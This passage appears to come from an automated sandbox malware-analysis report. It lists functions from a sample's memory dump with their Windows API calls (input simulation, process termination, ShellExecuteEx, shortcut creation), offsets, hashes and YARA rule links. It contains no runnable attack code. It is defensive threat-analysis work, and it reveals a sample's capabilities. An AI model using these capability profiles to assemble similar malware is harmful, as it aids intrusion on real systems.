                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2387181109-0
                                                                                                                                                                        • Opcode ID: 34c315b184e3d54cf5ebcb05e6a8efda161a8f1b0516b233fe1f6ea9a2b24968
                                                                                                                                                                        • Instruction ID: d42af1967b739de58f7f462a77580d5ad1247f2868f13b569119f7c039899ec4
                                                                                                                                                                        • Opcode Fuzzy Hash: 34c315b184e3d54cf5ebcb05e6a8efda161a8f1b0516b233fe1f6ea9a2b24968
                                                                                                                                                                        • Instruction Fuzzy Hash: 2A311072515356ABC720DF14DC49FABB7AEFB85364F400A2AF985D7181CA30E918CB92
                                                                                                                                                                        Function 002C55E1 Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • IsWindowVisible.USER32(?), ref: 002C55F9
                                                                                                                                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 002C5616
                                                                                                                                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 002C564E
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002C566C
                                                                                                                                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 002C5674
                                                                                                                                                                        • _wcsstr.LIBVCRUNTIME ref: 002C567E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 72514467-0
                                                                                                                                                                        • Opcode ID: 68c8021f41cc0946ad4361ed6ced94888bad159bb4328377d5f6d13a748ec63d
                                                                                                                                                                        • Instruction ID: a1bec88dab9434a96a0f0e91b54e3292d1cc12bc2d45c2bc3226bbddf61f6334
                                                                                                                                                                        • Opcode Fuzzy Hash: 68c8021f41cc0946ad4361ed6ced94888bad159bb4328377d5f6d13a748ec63d
                                                                                                                                                                        • Instruction Fuzzy Hash: 2B21F532214511BBEB156F24AC49F7BBBADDF45760F24413DF809CA191EAA0E891DA60
                                                                                                                                                                        Function 002D6263 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00265851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002655D1,?,?,002A4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00265871
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002D62C0
                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 002D63DA
                                                                                                                                                                        • CoCreateInstance.OLE32(00300CC4,00000000,00000001,00300B34,?), ref: 002D63F3
                                                                                                                                                                        • CoUninitialize.OLE32 ref: 002D6411
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                                                                        • String ID: .lnk
                                                                                                                                                                        • API String ID: 3172280962-24824748
                                                                                                                                                                        • Opcode ID: d165f2d7db4c1e1bf6ee4232e7a2982c42d15aef704ffb64181ed1600d429191
                                                                                                                                                                        • Instruction ID: 0fc3cc30a1cac31fbb4257f08a907ae0593e8c75575c59ff0d30667e9fec4425
                                                                                                                                                                        • Opcode Fuzzy Hash: d165f2d7db4c1e1bf6ee4232e7a2982c42d15aef704ffb64181ed1600d429191
                                                                                                                                                                        • Instruction Fuzzy Hash: 4DD15475A142019FC714DF24C488A2ABBE5FF88714F15899EF8859B361CB31EC95CF92
                                                                                                                                                                        Function 002836F2 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,002836E9,00283355), ref: 00283700
                                                                                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0028370E
                                                                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00283727
                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,002836E9,00283355), ref: 00283779
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3852720340-0
                                                                                                                                                                        • Opcode ID: 679013fc1ecec82d0dfdeed65fe324b10f00e66e26ea7f9c5a260034e4e95d7b
                                                                                                                                                                        • Instruction ID: 35091af01f98f8ebaa4a8846cd65d374b07154b760250502bda892a75fdb97b2
                                                                                                                                                                        • Opcode Fuzzy Hash: 679013fc1ecec82d0dfdeed65fe324b10f00e66e26ea7f9c5a260034e4e95d7b
                                                                                                                                                                        • Instruction Fuzzy Hash: 2901D8BE57F3126EA735BBB4BCCA9666698EB05F71B30022DF110410F1EF518D229B40
                                                                                                                                                                        Function 002930E7 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLastError.KERNEL32(?,00000000,00284D53,00000000,?,?,002868E2,?,?,00000000), ref: 002930EB
                                                                                                                                                                        • _free.LIBCMT ref: 0029311E
                                                                                                                                                                        • _free.LIBCMT ref: 00293146
                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,00000000), ref: 00293153
                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,00000000), ref: 0029315F
                                                                                                                                                                        • _abort.LIBCMT ref: 00293165
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast$_free$_abort
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3160817290-0
                                                                                                                                                                        • Opcode ID: 514e519b0bb75c822c13154776f6b926cf88e25968d0ce86cf2e84d8b32f4a1e
                                                                                                                                                                        • Instruction ID: 585759c429ddd68c9679c5173b9cfe02072ac17a464ddea1da7f4b1239341715
                                                                                                                                                                        • Opcode Fuzzy Hash: 514e519b0bb75c822c13154776f6b926cf88e25968d0ce86cf2e84d8b32f4a1e
                                                                                                                                                                        • Instruction Fuzzy Hash: 6CF0CD3653450177CF22BB35BC0AE6E265B9FC5770F210524FA28D21F1EE608A369961
                                                                                                                                                                        Function 002F9480 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00261F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00261F87
                                                                                                                                                                          • Part of subcall function 00261F2D: SelectObject.GDI32(?,00000000), ref: 00261F96
                                                                                                                                                                          • Part of subcall function 00261F2D: BeginPath.GDI32(?), ref: 00261FAD
                                                                                                                                                                          • Part of subcall function 00261F2D: SelectObject.GDI32(?,00000000), ref: 00261FD6
                                                                                                                                                                        • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 002F94AA
                                                                                                                                                                        • LineTo.GDI32(?,00000003,00000000), ref: 002F94BE
                                                                                                                                                                        • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 002F94CC
                                                                                                                                                                        • LineTo.GDI32(?,00000000,00000003), ref: 002F94DC
                                                                                                                                                                        • EndPath.GDI32(?), ref: 002F94EC
                                                                                                                                                                        • StrokePath.GDI32(?), ref: 002F94FC
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 43455801-0
                                                                                                                                                                        • Opcode ID: e9bcb63b8619c46ce815e9ef206767c8f9854df59cd67b2a713e302c6a9715fc
                                                                                                                                                                        • Instruction ID: 65c31618b0f62ceb49620ff2975b7e8ed45a63803a4a5b840a1c9b036862ed80
                                                                                                                                                                        • Opcode Fuzzy Hash: e9bcb63b8619c46ce815e9ef206767c8f9854df59cd67b2a713e302c6a9715fc
                                                                                                                                                                        • Instruction Fuzzy Hash: A511DB7601010DBFDF129F90EC89FAA7F6DEF093A4F048025FA195A161C771AD65DBA0
                                                                                                                                                                        Function 002C5B61 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetDC.USER32(00000000), ref: 002C5B7C
                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 002C5B8D
                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 002C5B94
                                                                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 002C5B9C
                                                                                                                                                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 002C5BB3
                                                                                                                                                                        • MulDiv.KERNEL32(000009EC,00000001,?), ref: 002C5BC5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CapsDevice$Release
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1035833867-0
                                                                                                                                                                        • Opcode ID: 65d0408f590bcb4fefe55c6a6c30b1ee6f5401272cc7bc4a11e5006e487433be
                                                                                                                                                                        • Instruction ID: eb07f20b301090395412d96ca2cd5485b11295b87a07887b6f337d9b468ae3c9
                                                                                                                                                                        • Opcode Fuzzy Hash: 65d0408f590bcb4fefe55c6a6c30b1ee6f5401272cc7bc4a11e5006e487433be
                                                                                                                                                                        • Instruction Fuzzy Hash: 97014475A00719BBEB109FA5AC49F5E7F79EF44761F004165FA09EB280D6709C11CF90
                                                                                                                                                                        Function 0026327E Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 002632AF
                                                                                                                                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 002632B7
                                                                                                                                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 002632C2
                                                                                                                                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 002632CD
                                                                                                                                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 002632D5
                                                                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 002632DD
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Virtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4278518827-0
                                                                                                                                                                        • Opcode ID: 0091fd5b621b268c943af7a5efd608dbb484cd409e9a3df8e6b4455e2b08585d
                                                                                                                                                                        • Instruction ID: bb86307e90e0cdc15a33b336e8b3f5ed2ca7a9b8165027c984a6e37c0cf32a91
                                                                                                                                                                        • Opcode Fuzzy Hash: 0091fd5b621b268c943af7a5efd608dbb484cd409e9a3df8e6b4455e2b08585d
                                                                                                                                                                        • Instruction Fuzzy Hash: DF016CB09017597DE3008F5A8C85B52FFA8FF19354F00411B915C47941C7F5A864CBE5
                                                                                                                                                                        Function 002CF437 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 002CF447
                                                                                                                                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 002CF45D
                                                                                                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 002CF46C
                                                                                                                                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002CF47B
                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002CF485
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002CF48C
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 839392675-0
                                                                                                                                                                        • Opcode ID: cf4803777a1e04ec3847f9c8786df64f9de13ab0b4bea90b6682f9a958b08b85
                                                                                                                                                                        • Instruction ID: f427b1e110e961ca2b74ea6394574f2fe5c5fb44216442f18f25b062cc6d2d94
                                                                                                                                                                        • Opcode Fuzzy Hash: cf4803777a1e04ec3847f9c8786df64f9de13ab0b4bea90b6682f9a958b08b85
                                                                                                                                                                        • Instruction Fuzzy Hash: 7BF03A36241158BBE7215B62AC0EEFF7B7DEFC6BA1F000068FA05D1190D7A06A01DAB5
                                                                                                                                                                        Function 002A34D6 Relevance: 9.0, APIs: 6, Instructions: 39windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetClientRect.USER32(?), ref: 002A34EF
                                                                                                                                                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 002A3506
                                                                                                                                                                        • GetWindowDC.USER32(?), ref: 002A3512
                                                                                                                                                                        • GetPixel.GDI32(00000000,?,?), ref: 002A3521
                                                                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 002A3533
                                                                                                                                                                        • GetSysColor.USER32(00000005), ref: 002A354D
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 272304278-0
                                                                                                                                                                        • Opcode ID: 24776c7da810e954513e48e047ee89f312006f46c07d1100cd205ceb36291d39
                                                                                                                                                                        • Instruction ID: b32d9dc9b1492549236a7ec6f0d020fea7925d2ea2d5b2d53dd052bb9fab37cc
                                                                                                                                                                        • Opcode Fuzzy Hash: 24776c7da810e954513e48e047ee89f312006f46c07d1100cd205ceb36291d39
                                                                                                                                                                        • Instruction Fuzzy Hash: 7A011631910205EFDB519F64EC08BFA7BB6FB09361F900170F91AA61A1CB311A51EB10
                                                                                                                                                                        Function 002C21C1 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 002C21CC
                                                                                                                                                                        • UnloadUserProfile.USERENV(?,?), ref: 002C21D8
                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 002C21E1
                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 002C21E9
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 002C21F2
                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 002C21F9
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 146765662-0
                                                                                                                                                                        • Opcode ID: b9a12994e07c25710b2d79672c52effd6a3cc0d715ddf87184aacbdb3eadb3e3
                                                                                                                                                                        • Instruction ID: 3dad8ddb1f34a664c1cac1aba46e7892ba2c9d00be6ee90ab027dd830e74de3b
                                                                                                                                                                        • Opcode Fuzzy Hash: b9a12994e07c25710b2d79672c52effd6a3cc0d715ddf87184aacbdb3eadb3e3
                                                                                                                                                                        • Instruction Fuzzy Hash: 94E0C27A004109BBDB012BA1FC0CD2ABF2AFB493B2B104230F22982070CB329420EF50
                                                                                                                                                                        Function 002EB7C4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • ShellExecuteExW.SHELL32(0000003C), ref: 002EB903
                                                                                                                                                                          • Part of subcall function 002641EA: _wcslen.LIBCMT ref: 002641EF
                                                                                                                                                                        • GetProcessId.KERNEL32(00000000), ref: 002EB998
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 002EB9C7
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                                                                                        • String ID: <$@
                                                                                                                                                                        • API String ID: 146682121-1426351568
                                                                                                                                                                        • Opcode ID: b371c6298e5f3dbc6d24da61d5f20b438d8660924c8465b3c91d79fc8942bb82
                                                                                                                                                                        • Instruction ID: fbd314ef2c8f20e367a8dd699347f6440d3f6c67643736fac033c69635149e36
                                                                                                                                                                        • Opcode Fuzzy Hash: b371c6298e5f3dbc6d24da61d5f20b438d8660924c8465b3c91d79fc8942bb82
                                                                                                                                                                        • Instruction Fuzzy Hash: 71718874A20215DFCB11EF55C484A9EBBF4BF08310F048499E859AB392CB70ED91CF90
                                                                                                                                                                        Function 002C7B05 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 002C7B6D
                                                                                                                                                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 002C7BA3
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 002C7BB4
                                                                                                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 002C7C36
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
